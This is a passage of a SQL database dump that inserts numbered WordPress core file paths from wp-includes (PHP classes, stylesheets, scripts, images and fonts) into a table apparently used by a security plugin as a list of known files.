(4136, 'wp-includes/SimplePie/Enclosure.php'),
(4137, 'wp-includes/SimplePie/Exception.php'),
(4138, 'wp-includes/SimplePie/File.php'),
(4139, 'wp-includes/SimplePie/HTTP/Parser.php'),
(4140, 'wp-includes/SimplePie/IRI.php'),
(4141, 'wp-includes/SimplePie/Item.php'),
(4142, 'wp-includes/SimplePie/Locator.php'),
(4143, 'wp-includes/SimplePie/Misc.php'),
(4144, 'wp-includes/SimplePie/Net/IPv6.php'),
(4145, 'wp-includes/SimplePie/Parse/Date.php'),
(4146, 'wp-includes/SimplePie/Parser.php'),
(4147, 'wp-includes/SimplePie/Rating.php'),
(4148, 'wp-includes/SimplePie/Registry.php'),
(4149, 'wp-includes/SimplePie/Restriction.php'),
(4150, 'wp-includes/SimplePie/Sanitize.php'),
(4151, 'wp-includes/SimplePie/Source.php'),
(4152, 'wp-includes/SimplePie/XML/Declaration/Parser.php'),
(4153, 'wp-includes/SimplePie/gzdecode.php'),
(4154, 'wp-includes/Text/Diff/Engine/native.php'),
(4155, 'wp-includes/Text/Diff/Engine/shell.php'),
(4156, 'wp-includes/Text/Diff/Engine/string.php'),
(4157, 'wp-includes/Text/Diff/Engine/xdiff.php'),
(4158, 'wp-includes/Text/Diff/Renderer/inline.php'),
(4159, 'wp-includes/Text/Diff/Renderer.php'),
(4160, 'wp-includes/Text/Diff.php'),
(4161, 'wp-includes/admin-bar.php'),
(4162, 'wp-includes/atomlib.php'),
(4163, 'wp-includes/author-template.php'),
(4164, 'wp-includes/blocks/archives.php'),
(4165, 'wp-includes/blocks/block.php'),
(4166, 'wp-includes/blocks/calendar.php'),
(4167, 'wp-includes/blocks/categories.php'),
(4168, 'wp-includes/blocks/latest-comments.php'),
(4169, 'wp-includes/blocks/latest-posts.php'),
(4170, 'wp-includes/blocks/rss.php'),
(4171, 'wp-includes/blocks/search.php'),
(4172, 'wp-includes/blocks/shortcode.php'),
(4173, 'wp-includes/blocks/tag-cloud.php'),
(4174, 'wp-includes/blocks.php'),
(4175, 'wp-includes/bookmark-template.php'),
(4176, 'wp-includes/bookmark.php'),
(4177, 'wp-includes/cache.php'),
(4178, 'wp-includes/canonical.php'),
(4179, 'wp-includes/capabilities.php'),
(4180, 'wp-includes/category-template.php'),
(4181, 'wp-includes/category.php'),
(4182, 'wp-includes/certificates/ca-bundle.crt'),
(4183, 'wp-includes/class-IXR.php'),
(4184, 'wp-includes/class-feed.php'),
(4185, 'wp-includes/class-http.php'),
(4186, 'wp-includes/class-json.php'),
(4187, 'wp-includes/class-oembed.php'),
(4188, 'wp-includes/class-phpass.php'),
(4189, 'wp-includes/class-phpmailer.php'),
(4190, 'wp-includes/class-pop3.php'),
(4191, 'wp-includes/class-requests.php'),
(4192, 'wp-includes/class-simplepie.php'),
(4193, 'wp-includes/class-smtp.php'),
(4194, 'wp-includes/class-snoopy.php'),
(4195, 'wp-includes/class-walker-category-dropdown.php'),
(4196, 'wp-includes/class-walker-category.php'),
(4197, 'wp-includes/class-walker-comment.php'),
(4198, 'wp-includes/class-walker-nav-menu.php'),
(4199, 'wp-includes/class-walker-page-dropdown.php'),
(4200, 'wp-includes/class-walker-page.php'),
(4201, 'wp-includes/class-wp-admin-bar.php'),
(4202, 'wp-includes/class-wp-ajax-response.php'),
(4203, 'wp-includes/class-wp-block-parser.php'),
(4204, 'wp-includes/class-wp-block-styles-registry.php'),
(4205, 'wp-includes/class-wp-block-type-registry.php'),
(4206, 'wp-includes/class-wp-block-type.php'),
(4207, 'wp-includes/class-wp-comment-query.php'),
(4208, 'wp-includes/class-wp-comment.php'),
(4209, 'wp-includes/class-wp-customize-control.php'),
(4210, 'wp-includes/class-wp-customize-manager.php'),
(4211, 'wp-includes/class-wp-customize-nav-menus.php'),
(4212, 'wp-includes/class-wp-customize-panel.php'),
(4213, 'wp-includes/class-wp-customize-section.php'),
(4214, 'wp-includes/class-wp-customize-setting.php'),
(4215, 'wp-includes/class-wp-customize-widgets.php'),
(4216, 'wp-includes/class-wp-date-query.php'),
(4217, 'wp-includes/class-wp-dependency.php'),
(4218, 'wp-includes/class-wp-editor.php'),
(4219, 'wp-includes/class-wp-embed.php'),
(4220, 'wp-includes/class-wp-error.php'),
(4221, 'wp-includes/class-wp-fatal-error-handler.php'),
(4222, 'wp-includes/class-wp-feed-cache-transient.php'),
(4223, 'wp-includes/class-wp-feed-cache.php'),
(4224, 'wp-includes/class-wp-hook.php'),
(4225, 'wp-includes/class-wp-http-cookie.php'),
(4226, 'wp-includes/class-wp-http-curl.php'),
(4227, 'wp-includes/class-wp-http-encoding.php'),
(4228, 'wp-includes/class-wp-http-ixr-client.php'),
(4229, 'wp-includes/class-wp-http-proxy.php'),
(4230, 'wp-includes/class-wp-http-requests-hooks.php'),
(4231, 'wp-includes/class-wp-http-requests-response.php'),
(4232, 'wp-includes/class-wp-http-response.php'),
(4233, 'wp-includes/class-wp-http-streams.php'),
(4234, 'wp-includes/class-wp-image-editor-gd.php'),
(4235, 'wp-includes/class-wp-image-editor-imagick.php'),
(4236, 'wp-includes/class-wp-image-editor.php'),
(4237, 'wp-includes/class-wp-list-util.php'),
(4238, 'wp-includes/class-wp-locale-switcher.php'),
(4239, 'wp-includes/class-wp-locale.php'),
(4240, 'wp-includes/class-wp-matchesmapregex.php'),
(4241, 'wp-includes/class-wp-meta-query.php'),
(4242, 'wp-includes/class-wp-metadata-lazyloader.php'),
(4243, 'wp-includes/class-wp-network-query.php'),
(4244, 'wp-includes/class-wp-network.php'),
(4245, 'wp-includes/class-wp-oembed-controller.php'),
(4246, 'wp-includes/class-wp-oembed.php'),
(4247, 'wp-includes/class-wp-paused-extensions-storage.php'),
(4248, 'wp-includes/class-wp-post-type.php'),
(4249, 'wp-includes/class-wp-post.php'),
(4250, 'wp-includes/class-wp-query.php'),
(4251, 'wp-includes/class-wp-recovery-mode-cookie-service.php'),
(4252, 'wp-includes/class-wp-recovery-mode-email-service.php'),
(4253, 'wp-includes/class-wp-recovery-mode-key-service.php'),
(4254, 'wp-includes/class-wp-recovery-mode-link-service.php'),
(4255, 'wp-includes/class-wp-recovery-mode.php'),
(4256, 'wp-includes/class-wp-rewrite.php'),
(4257, 'wp-includes/class-wp-role.php'),
(4258, 'wp-includes/class-wp-roles.php'),
(4259, 'wp-includes/class-wp-session-tokens.php'),
(4260, 'wp-includes/class-wp-simplepie-file.php'),
(4261, 'wp-includes/class-wp-simplepie-sanitize-kses.php'),
(4262, 'wp-includes/class-wp-site-query.php'),
(4263, 'wp-includes/class-wp-site.php'),
(4264, 'wp-includes/class-wp-tax-query.php'),
(4265, 'wp-includes/class-wp-taxonomy.php'),
(4266, 'wp-includes/class-wp-term-query.php'),
(4267, 'wp-includes/class-wp-term.php'),
(4268, 'wp-includes/class-wp-text-diff-renderer-inline.php'),
(4269, 'wp-includes/class-wp-text-diff-renderer-table.php'),
(4270, 'wp-includes/class-wp-theme.php'),
(4271, 'wp-includes/class-wp-user-meta-session-tokens.php'),
(4272, 'wp-includes/class-wp-user-query.php'),
(4273, 'wp-includes/class-wp-user-request.php'),
(4274, 'wp-includes/class-wp-user.php'),
(4275, 'wp-includes/class-wp-walker.php'),
(4276, 'wp-includes/class-wp-widget-factory.php'),
(4277, 'wp-includes/class-wp-widget.php'),
(4278, 'wp-includes/class-wp-xmlrpc-server.php'),
(4279, 'wp-includes/class-wp.php'),
(4280, 'wp-includes/class.wp-dependencies.php'),
(4281, 'wp-includes/class.wp-scripts.php'),
(4282, 'wp-includes/class.wp-styles.php'),
(4283, 'wp-includes/comment-template.php'),
(4284, 'wp-includes/comment.php'),
(4285, 'wp-includes/compat.php'),
(4286, 'wp-includes/cron.php'),
(4287, 'wp-includes/css/admin-bar-rtl.css'),
(4288, 'wp-includes/css/admin-bar-rtl.min.css'),
(4289, 'wp-includes/css/admin-bar.css'),
(4290, 'wp-includes/css/admin-bar.min.css'),
(4291, 'wp-includes/css/buttons-rtl.css'),
(4292, 'wp-includes/css/buttons-rtl.min.css'),
(4293, 'wp-includes/css/buttons.css'),
(4294, 'wp-includes/css/buttons.min.css'),
(4295, 'wp-includes/css/customize-preview-rtl.css'),
(4296, 'wp-includes/css/customize-preview-rtl.min.css'),
(4297, 'wp-includes/css/customize-preview.css'),
(4298, 'wp-includes/css/customize-preview.min.css'),
(4299, 'wp-includes/css/dashicons.css'),
(4300, 'wp-includes/css/dashicons.min.css'),
(4301, 'wp-includes/css/dist/block-editor/style-rtl.css'),
(4302, 'wp-includes/css/dist/block-editor/style-rtl.min.css'),
(4303, 'wp-includes/css/dist/block-editor/style.css'),
(4304, 'wp-includes/css/dist/block-editor/style.min.css'),
(4305, 'wp-includes/css/dist/block-library/editor-rtl.css'),
(4306, 'wp-includes/css/dist/block-library/editor-rtl.min.css'),
(4307, 'wp-includes/css/dist/block-library/editor.css'),
(4308, 'wp-includes/css/dist/block-library/editor.min.css'),
(4309, 'wp-includes/css/dist/block-library/style-rtl.css'),
(4310, 'wp-includes/css/dist/block-library/style-rtl.min.css'),
(4311, 'wp-includes/css/dist/block-library/style.css'),
(4312, 'wp-includes/css/dist/block-library/style.min.css'),
(4313, 'wp-includes/css/dist/block-library/theme-rtl.css'),
(4314, 'wp-includes/css/dist/block-library/theme-rtl.min.css'),
(4315, 'wp-includes/css/dist/block-library/theme.css'),
(4316, 'wp-includes/css/dist/block-library/theme.min.css'),
(4317, 'wp-includes/css/dist/components/style-rtl.css'),
(4318, 'wp-includes/css/dist/components/style-rtl.min.css'),
(4319, 'wp-includes/css/dist/components/style.css'),
(4320, 'wp-includes/css/dist/components/style.min.css'),
(4321, 'wp-includes/css/dist/edit-post/style-rtl.css'),
(4322, 'wp-includes/css/dist/edit-post/style-rtl.min.css'),
(4323, 'wp-includes/css/dist/edit-post/style.css'),
(4324, 'wp-includes/css/dist/edit-post/style.min.css'),
(4325, 'wp-includes/css/dist/editor/editor-styles-rtl.css'),
(4326, 'wp-includes/css/dist/editor/editor-styles-rtl.min.css'),
(4327, 'wp-includes/css/dist/editor/editor-styles.css'),
(4328, 'wp-includes/css/dist/editor/editor-styles.min.css'),
(4329, 'wp-includes/css/dist/editor/style-rtl.css'),
(4330, 'wp-includes/css/dist/editor/style-rtl.min.css'),
(4331, 'wp-includes/css/dist/editor/style.css'),
(4332, 'wp-includes/css/dist/editor/style.min.css'),
(4333, 'wp-includes/css/dist/format-library/style-rtl.css'),
(4334, 'wp-includes/css/dist/format-library/style-rtl.min.css'),
(4335, 'wp-includes/css/dist/format-library/style.css'),
(4336, 'wp-includes/css/dist/format-library/style.min.css'),
(4337, 'wp-includes/css/dist/list-reusable-blocks/style-rtl.css'),
(4338, 'wp-includes/css/dist/list-reusable-blocks/style-rtl.min.css'),
(4339, 'wp-includes/css/dist/list-reusable-blocks/style.css'),
(4340, 'wp-includes/css/dist/list-reusable-blocks/style.min.css'),
(4341, 'wp-includes/css/dist/nux/style-rtl.css'),
(4342, 'wp-includes/css/dist/nux/style-rtl.min.css'),
(4343, 'wp-includes/css/dist/nux/style.css'),
(4344, 'wp-includes/css/dist/nux/style.min.css'),
(4345, 'wp-includes/css/editor-rtl.css'),
(4346, 'wp-includes/css/editor-rtl.min.css'),
(4347, 'wp-includes/css/editor.css'),
(4348, 'wp-includes/css/editor.min.css'),
(4349, 'wp-includes/css/jquery-ui-dialog-rtl.css'),
(4350, 'wp-includes/css/jquery-ui-dialog-rtl.min.css'),
(4351, 'wp-includes/css/jquery-ui-dialog.css'),
(4352, 'wp-includes/css/jquery-ui-dialog.min.css'),
(4353, 'wp-includes/css/media-views-rtl.css'),
(4354, 'wp-includes/css/media-views-rtl.min.css'),
(4355, 'wp-includes/css/media-views.css'),
(4356, 'wp-includes/css/media-views.min.css'),
(4357, 'wp-includes/css/wp-auth-check-rtl.css'),
(4358, 'wp-includes/css/wp-auth-check-rtl.min.css'),
(4359, 'wp-includes/css/wp-auth-check.css'),
(4360, 'wp-includes/css/wp-auth-check.min.css'),
(4361, 'wp-includes/css/wp-embed-template-ie.css'),
(4362, 'wp-includes/css/wp-embed-template-ie.min.css'),
(4363, 'wp-includes/css/wp-embed-template.css'),
(4364, 'wp-includes/css/wp-embed-template.min.css'),
(4365, 'wp-includes/css/wp-pointer-rtl.css'),
(4366, 'wp-includes/css/wp-pointer-rtl.min.css'),
(4367, 'wp-includes/css/wp-pointer.css'),
(4368, 'wp-includes/css/wp-pointer.min.css'),
(4369, 'wp-includes/customize/class-wp-customize-background-image-control.php'),
(4370, 'wp-includes/customize/class-wp-customize-background-image-setting.php'),
(4371, 'wp-includes/customize/class-wp-customize-background-position-control.php'),
(4372, 'wp-includes/customize/class-wp-customize-code-editor-control.php'),
(4373, 'wp-includes/customize/class-wp-customize-color-control.php'),
(4374, 'wp-includes/customize/class-wp-customize-cropped-image-control.php'),
(4375, 'wp-includes/customize/class-wp-customize-custom-css-setting.php'),
(4376, 'wp-includes/customize/class-wp-customize-date-time-control.php'),
(4377, 'wp-includes/customize/class-wp-customize-filter-setting.php'),
(4378, 'wp-includes/customize/class-wp-customize-header-image-control.php'),
(4379, 'wp-includes/customize/class-wp-customize-header-image-setting.php'),
(4380, 'wp-includes/customize/class-wp-customize-image-control.php'),
(4381, 'wp-includes/customize/class-wp-customize-media-control.php'),
(4382, 'wp-includes/customize/class-wp-customize-nav-menu-auto-add-control.php'),
(4383, 'wp-includes/customize/class-wp-customize-nav-menu-control.php'),
(4384, 'wp-includes/customize/class-wp-customize-nav-menu-item-control.php'),
(4385, 'wp-includes/customize/class-wp-customize-nav-menu-item-setting.php'),
(4386, 'wp-includes/customize/class-wp-customize-nav-menu-location-control.php'),
(4387, 'wp-includes/customize/class-wp-customize-nav-menu-locations-control.php'),
(4388, 'wp-includes/customize/class-wp-customize-nav-menu-name-control.php'),
(4389, 'wp-includes/customize/class-wp-customize-nav-menu-section.php'),
(4390, 'wp-includes/customize/class-wp-customize-nav-menu-setting.php'),
(4391, 'wp-includes/customize/class-wp-customize-nav-menus-panel.php'),
(4392, 'wp-includes/customize/class-wp-customize-new-menu-control.php'),
(4393, 'wp-includes/customize/class-wp-customize-new-menu-section.php'),
(4394, 'wp-includes/customize/class-wp-customize-partial.php'),
(4395, 'wp-includes/customize/class-wp-customize-selective-refresh.php'),
(4396, 'wp-includes/customize/class-wp-customize-sidebar-section.php'),
(4397, 'wp-includes/customize/class-wp-customize-site-icon-control.php'),
(4398, 'wp-includes/customize/class-wp-customize-theme-control.php'),
(4399, 'wp-includes/customize/class-wp-customize-themes-panel.php'),
(4400, 'wp-includes/customize/class-wp-customize-themes-section.php'),
(4401, 'wp-includes/customize/class-wp-customize-upload-control.php'),
(4402, 'wp-includes/customize/class-wp-widget-area-customize-control.php'),
(4403, 'wp-includes/customize/class-wp-widget-form-customize-control.php'),
(4404, 'wp-includes/date.php'),
(4405, 'wp-includes/default-constants.php'),
(4406, 'wp-includes/default-filters.php'),
(4407, 'wp-includes/default-widgets.php'),
(4408, 'wp-includes/deprecated.php'),
(4409, 'wp-includes/embed-template.php'),
(4410, 'wp-includes/embed.php'),
(4411, 'wp-includes/error-protection.php'),
(4412, 'wp-includes/feed-atom-comments.php'),
(4413, 'wp-includes/feed-atom.php'),
(4414, 'wp-includes/feed-rdf.php'),
(4415, 'wp-includes/feed-rss.php'),
(4416, 'wp-includes/feed-rss2-comments.php'),
(4417, 'wp-includes/feed-rss2.php'),
(4418, 'wp-includes/feed.php'),
(4419, 'wp-includes/fonts/dashicons.eot'),
(4420, 'wp-includes/fonts/dashicons.svg'),
(4421, 'wp-includes/fonts/dashicons.ttf'),
(4422, 'wp-includes/fonts/dashicons.woff'),
(4423, 'wp-includes/fonts/dashicons.woff2'),
(4424, 'wp-includes/formatting.php'),
(4425, 'wp-includes/functions.php'),
(4426, 'wp-includes/functions.wp-scripts.php'),
(4427, 'wp-includes/functions.wp-styles.php'),
(4428, 'wp-includes/general-template.php'),
(4429, 'wp-includes/http.php'),
(4430, 'wp-includes/images/admin-bar-sprite-2x.png'),
(4431, 'wp-includes/images/admin-bar-sprite.png'),
(4432, 'wp-includes/images/arrow-pointer-blue-2x.png'),
(4433, 'wp-includes/images/arrow-pointer-blue.png'),
(4434, 'wp-includes/images/blank.gif'),
(4435, 'wp-includes/images/crystal/archive.png'),
(4436, 'wp-includes/images/crystal/audio.png'),
(4437, 'wp-includes/images/crystal/code.png'),
(4438, 'wp-includes/images/crystal/default.png'),
(4439, 'wp-includes/images/crystal/document.png'),
(4440, 'wp-includes/images/crystal/interactive.png'),
(4441, 'wp-includes/images/crystal/license.txt'),
(4442, 'wp-includes/images/crystal/spreadsheet.png'),
(4443, 'wp-includes/images/crystal/text.png'),
(4444, 'wp-includes/images/crystal/video.png'),
(4445, 'wp-includes/images/down_arrow-2x.gif'),
(4446, 'wp-includes/images/down_arrow.gif'),
(4447, 'wp-includes/images/icon-pointer-flag-2x.png'),
(4448, 'wp-includes/images/icon-pointer-flag.png'),
(4449, 'wp-includes/images/media/archive.png'),
(4450, 'wp-includes/images/media/audio.png'),
(4451, 'wp-includes/images/media/code.png'),
(4452, 'wp-includes/images/media/default.png'),
(4453, 'wp-includes/images/media/document.png'),
(4454, 'wp-includes/images/media/interactive.png'),
(4455, 'wp-includes/images/media/spreadsheet.png'),
(4456, 'wp-includes/images/media/text.png'),
(4457, 'wp-includes/images/media/video.png'),
(4458, 'wp-includes/images/rss-2x.png'),
(4459, 'wp-includes/images/rss.png'),
(4460, 'wp-includes/images/smilies/frownie.png'),
(4461, 'wp-includes/images/smilies/icon_arrow.gif'),
(4462, 'wp-includes/images/smilies/icon_biggrin.gif'),
(4463, 'wp-includes/images/smilies/icon_confused.gif'),
(4464, 'wp-includes/images/smilies/icon_cool.gif'),
(4465, 'wp-includes/images/smilies/icon_cry.gif'),
(4466, 'wp-includes/images/smilies/icon_eek.gif'),
(4467, 'wp-includes/images/smilies/icon_evil.gif'),
(4468, 'wp-includes/images/smilies/icon_exclaim.gif'),
(4469, 'wp-includes/images/smilies/icon_idea.gif'),
(4470, 'wp-includes/images/smilies/icon_lol.gif'),
(4471, 'wp-includes/images/smilies/icon_mad.gif'),
(4472, 'wp-includes/images/smilies/icon_mrgreen.gif'),
(4473, 'wp-includes/images/smilies/icon_neutral.gif'),
(4474, 'wp-includes/images/smilies/icon_question.gif'),
(4475, 'wp-includes/images/smilies/icon_razz.gif'),
(4476, 'wp-includes/images/smilies/icon_redface.gif'),
(4477, 'wp-includes/images/smilies/icon_rolleyes.gif'),
(4478, 'wp-includes/images/smilies/icon_sad.gif'),
(4479, 'wp-includes/images/smilies/icon_smile.gif'),
(4480, 'wp-includes/images/smilies/icon_surprised.gif'),
(4481, 'wp-includes/images/smilies/icon_twisted.gif'),
(4482, 'wp-includes/images/smilies/icon_wink.gif'),
(4483, 'wp-includes/images/smilies/mrgreen.png'),
(4484, 'wp-includes/images/smilies/rolleyes.png'),
(4485, 'wp-includes/images/smilies/simple-smile.png'),
(4486, 'wp-includes/images/spinner-2x.gif'),
(4487, 'wp-includes/images/spinner.gif'),
(4488, 'wp-includes/images/toggle-arrow-2x.png'),
(4489, 'wp-includes/images/toggle-arrow.png'),
(4490, 'wp-includes/images/uploader-icons-2x.png'),
(4491, 'wp-includes/images/uploader-icons.png'),
(4492, 'wp-includes/images/w-logo-blue.png'),
(4493, 'wp-includes/images/wlw/wp-comments.png'),
(4494, 'wp-includes/images/wlw/wp-icon.png'),
(4495, 'wp-includes/images/wlw/wp-watermark.png'),
(4496, 'wp-includes/images/wpicons-2x.png'),
(4497, 'wp-includes/images/wpicons.png'),
(4498, 'wp-includes/images/wpspin-2x.gif'),
(4499, 'wp-includes/images/wpspin.gif'),
(4500, 'wp-includes/images/xit-2x.gif'),
(4501, 'wp-includes/images/xit.gif'),
(4502, 'wp-includes/js/admin-bar.js'),
(4503, 'wp-includes/js/admin-bar.min.js'),
(4504, 'wp-includes/js/api-request.js'),
(4505, 'wp-includes/js/api-request.min.js'),
(4506, 'wp-includes/js/autosave.js'),
(4507, 'wp-includes/js/autosave.min.js'),
(4508, 'wp-includes/js/backbone.js'),
(4509, 'wp-includes/js/backbone.min.js'),
(4510, 'wp-includes/js/clipboard.js'),
(4511, 'wp-includes/js/clipboard.min.js'),
(4512, 'wp-includes/js/codemirror/codemirror.min.css'),
(4513, 'wp-includes/js/codemirror/codemirror.min.js'),
(4514, 'wp-includes/js/codemirror/csslint.js'),
(4515, 'wp-includes/js/codemirror/esprima.js'),
(4516, 'wp-includes/js/codemirror/fakejshint.js'),
(4517, 'wp-includes/js/codemirror/htmlhint-kses.js'),
(4518, 'wp-includes/js/codemirror/htmlhint.js'),
(4519, 'wp-includes/js/codemirror/jsonlint.js'),
(4520, 'wp-includes/js/colorpicker.js'),
(4521, 'wp-includes/js/colorpicker.min.js'),
(4522, 'wp-includes/js/comment-reply.js'),
(4523, 'wp-includes/js/comment-reply.min.js'),
(4524, 'wp-includes/js/crop/cropper.css'),
(4525, 'wp-includes/js/crop/cropper.js'),
(4526, 'wp-includes/js/crop/marqueeHoriz.gif'),
(4527, 'wp-includes/js/crop/marqueeVert.gif'),
(4528, 'wp-includes/js/customize-base.js'),
(4529, 'wp-includes/js/customize-base.min.js'),
(4530, 'wp-includes/js/customize-loader.js'),
(4531, 'wp-includes/js/customize-loader.min.js'),
(4532, 'wp-includes/js/customize-models.js'),
(4533, 'wp-includes/js/customize-models.min.js'),
(4534, 'wp-includes/js/customize-preview-nav-menus.js'),
(4535, 'wp-includes/js/customize-preview-nav-menus.min.js'),
(4536, 'wp-includes/js/customize-preview-widgets.js'),
(4537, 'wp-includes/js/customize-preview-widgets.min.js'),
(4538, 'wp-includes/js/customize-preview.js'),
(4539, 'wp-includes/js/customize-preview.min.js'),
(4540, 'wp-includes/js/customize-selective-refresh.js'),
(4541, 'wp-includes/js/customize-selective-refresh.min.js'),
(4542, 'wp-includes/js/customize-views.js'),
(4543, 'wp-includes/js/customize-views.min.js'),
(4544, 'wp-includes/js/dist/a11y.js'),
(4545, 'wp-includes/js/dist/a11y.min.js'),
(4546, 'wp-includes/js/dist/annotations.js'),
(4547, 'wp-includes/js/dist/annotations.min.js'),
(4548, 'wp-includes/js/dist/api-fetch.js'),
(4549, 'wp-includes/js/dist/api-fetch.min.js'),
(4550, 'wp-includes/js/dist/autop.js'),
(4551, 'wp-includes/js/dist/autop.min.js'),
(4552, 'wp-includes/js/dist/blob.js'),
(4553, 'wp-includes/js/dist/blob.min.js'),
(4554, 'wp-includes/js/dist/block-editor.js'),
(4555, 'wp-includes/js/dist/block-editor.min.js'),
(4556, 'wp-includes/js/dist/block-library.js'),
(4557, 'wp-includes/js/dist/block-library.min.js'),
(4558, 'wp-includes/js/dist/block-serialization-default-parser.js'),
(4559, 'wp-includes/js/dist/block-serialization-default-parser.min.js'),
(4560, 'wp-includes/js/dist/blocks.js'),
(4561, 'wp-includes/js/dist/blocks.min.js'),
(4562, 'wp-includes/js/dist/components.js'),
(4563, 'wp-includes/js/dist/components.min.js'),
(4564, 'wp-includes/js/dist/compose.js'),
(4565, 'wp-includes/js/dist/compose.min.js'),
(4566, 'wp-includes/js/dist/core-data.js'),
(4567, 'wp-includes/js/dist/core-data.min.js'),
(4568, 'wp-includes/js/dist/data-controls.js'),
(4569, 'wp-includes/js/dist/data-controls.min.js'),
(4570, 'wp-includes/js/dist/data.js'),
(4571, 'wp-includes/js/dist/data.min.js'),
(4572, 'wp-includes/js/dist/date.js'),
(4573, 'wp-includes/js/dist/date.min.js'),
(4574, 'wp-includes/js/dist/deprecated.js'),
(4575, 'wp-includes/js/dist/deprecated.min.js'),
(4576, 'wp-includes/js/dist/dom-ready.js'),
(4577, 'wp-includes/js/dist/dom-ready.min.js'),
(4578, 'wp-includes/js/dist/dom.js'),
(4579, 'wp-includes/js/dist/dom.min.js'),
(4580, 'wp-includes/js/dist/edit-post.js'),
(4581, 'wp-includes/js/dist/edit-post.min.js'),
(4582, 'wp-includes/js/dist/editor.js'),
(4583, 'wp-includes/js/dist/editor.min.js'),
(4584, 'wp-includes/js/dist/element.js'),
(4585, 'wp-includes/js/dist/element.min.js'),
(4586, 'wp-includes/js/dist/escape-html.js'),
(4587, 'wp-includes/js/dist/escape-html.min.js'),
(4588, 'wp-includes/js/dist/format-library.js'),
(4589, 'wp-includes/js/dist/format-library.min.js'),
(4590, 'wp-includes/js/dist/hooks.js'),
(4591, 'wp-includes/js/dist/hooks.min.js'),
(4592, 'wp-includes/js/dist/html-entities.js'),
(4593, 'wp-includes/js/dist/html-entities.min.js'),
(4594, 'wp-includes/js/dist/i18n.js'),
(4595, 'wp-includes/js/dist/i18n.min.js'),
(4596, 'wp-includes/js/dist/is-shallow-equal.js'),
(4597, 'wp-includes/js/dist/is-shallow-equal.min.js'),
(4598, 'wp-includes/js/dist/keycodes.js'),
(4599, 'wp-includes/js/dist/keycodes.min.js'),
(4600, 'wp-includes/js/dist/list-reusable-blocks.js'),
(4601, 'wp-includes/js/dist/list-reusable-blocks.min.js'),
(4602, 'wp-includes/js/dist/media-utils.js'),
(4603, 'wp-includes/js/dist/media-utils.min.js'),
(4604, 'wp-includes/js/dist/notices.js'),
(4605, 'wp-includes/js/dist/notices.min.js'),
(4606, 'wp-includes/js/dist/nux.js'),
(4607, 'wp-includes/js/dist/nux.min.js'),
(4608, 'wp-includes/js/dist/plugins.js'),
(4609, 'wp-includes/js/dist/plugins.min.js'),
(4610, 'wp-includes/js/dist/priority-queue.js'),
(4611, 'wp-includes/js/dist/priority-queue.min.js'),
(4612, 'wp-includes/js/dist/redux-routine.js'),
(4613, 'wp-includes/js/dist/redux-routine.min.js'),
(4614, 'wp-includes/js/dist/rich-text.js'),
(4615, 'wp-includes/js/dist/rich-text.min.js'),
(4616, 'wp-includes/js/dist/server-side-render.js'),
(4617, 'wp-includes/js/dist/server-side-render.min.js'),
(4618, 'wp-includes/js/dist/shortcode.js'),
(4619, 'wp-includes/js/dist/shortcode.min.js');
INSERT INTO `zdenl_wfknownfilelist` (`id`, `path`) VALUES
(4620, 'wp-includes/js/dist/token-list.js'),
(4621, 'wp-includes/js/dist/token-list.min.js'),
(4622, 'wp-includes/js/dist/url.js'),
(4623, 'wp-includes/js/dist/url.min.js'),
(4624, 'wp-includes/js/dist/vendor/lodash.js'),
(4625, 'wp-includes/js/dist/vendor/lodash.min.js'),
(4626, 'wp-includes/js/dist/vendor/moment.js'),
(4627, 'wp-includes/js/dist/vendor/moment.min.js'),
(4628, 'wp-includes/js/dist/vendor/react-dom.js'),
(4629, 'wp-includes/js/dist/vendor/react-dom.min.js'),
(4630, 'wp-includes/js/dist/vendor/react.js'),
(4631, 'wp-includes/js/dist/vendor/react.min.js'),
(4632, 'wp-includes/js/dist/vendor/wp-polyfill-element-closest.js'),
(4633, 'wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js'),
(4634, 'wp-includes/js/dist/vendor/wp-polyfill-fetch.js'),
(4635, 'wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js'),
(4636, 'wp-includes/js/dist/vendor/wp-polyfill-formdata.js'),
(4637, 'wp-includes/js/dist/vendor/wp-polyfill-formdata.min.js'),
(4638, 'wp-includes/js/dist/vendor/wp-polyfill-node-contains.js'),
(4639, 'wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js'),
(4640, 'wp-includes/js/dist/vendor/wp-polyfill.js'),
(4641, 'wp-includes/js/dist/vendor/wp-polyfill.min.js'),
(4642, 'wp-includes/js/dist/viewport.js'),
(4643, 'wp-includes/js/dist/viewport.min.js'),
(4644, 'wp-includes/js/dist/wordcount.js'),
(4645, 'wp-includes/js/dist/wordcount.min.js'),
(4646, 'wp-includes/js/heartbeat.js'),
(4647, 'wp-includes/js/heartbeat.min.js'),
(4648, 'wp-includes/js/hoverIntent.js'),
(4649, 'wp-includes/js/hoverIntent.min.js'),
(4650, 'wp-includes/js/hoverintent-js.min.js'),
(4651, 'wp-includes/js/imagesloaded.min.js'),
(4652, 'wp-includes/js/imgareaselect/border-anim-h.gif'),
(4653, 'wp-includes/js/imgareaselect/border-anim-v.gif'),
(4654, 'wp-includes/js/imgareaselect/imgareaselect.css'),
(4655, 'wp-includes/js/imgareaselect/jquery.imgareaselect.js'),
(4656, 'wp-includes/js/imgareaselect/jquery.imgareaselect.min.js'),
(4657, 'wp-includes/js/jcrop/Jcrop.gif'),
(4658, 'wp-includes/js/jcrop/jquery.Jcrop.min.css'),
(4659, 'wp-includes/js/jcrop/jquery.Jcrop.min.js'),
(4660, 'wp-includes/js/jquery/jquery-migrate.js'),
(4661, 'wp-includes/js/jquery/jquery-migrate.min.js'),
(4662, 'wp-includes/js/jquery/jquery.color.min.js'),
(4663, 'wp-includes/js/jquery/jquery.form.js'),
(4664, 'wp-includes/js/jquery/jquery.form.min.js'),
(4665, 'wp-includes/js/jquery/jquery.hotkeys.js'),
(4666, 'wp-includes/js/jquery/jquery.hotkeys.min.js'),
(4667, 'wp-includes/js/jquery/jquery.js'),
(4668, 'wp-includes/js/jquery/jquery.masonry.min.js'),
(4669, 'wp-includes/js/jquery/jquery.query.js'),
(4670, 'wp-includes/js/jquery/jquery.schedule.js'),
(4671, 'wp-includes/js/jquery/jquery.serialize-object.js'),
(4672, 'wp-includes/js/jquery/jquery.table-hotkeys.js'),
(4673, 'wp-includes/js/jquery/jquery.table-hotkeys.min.js'),
(4674, 'wp-includes/js/jquery/jquery.ui.touch-punch.js'),
(4675, 'wp-includes/js/jquery/suggest.js'),
(4676, 'wp-includes/js/jquery/suggest.min.js'),
(4677, 'wp-includes/js/jquery/ui/accordion.min.js'),
(4678, 'wp-includes/js/jquery/ui/autocomplete.min.js'),
(4679, 'wp-includes/js/jquery/ui/button.min.js'),
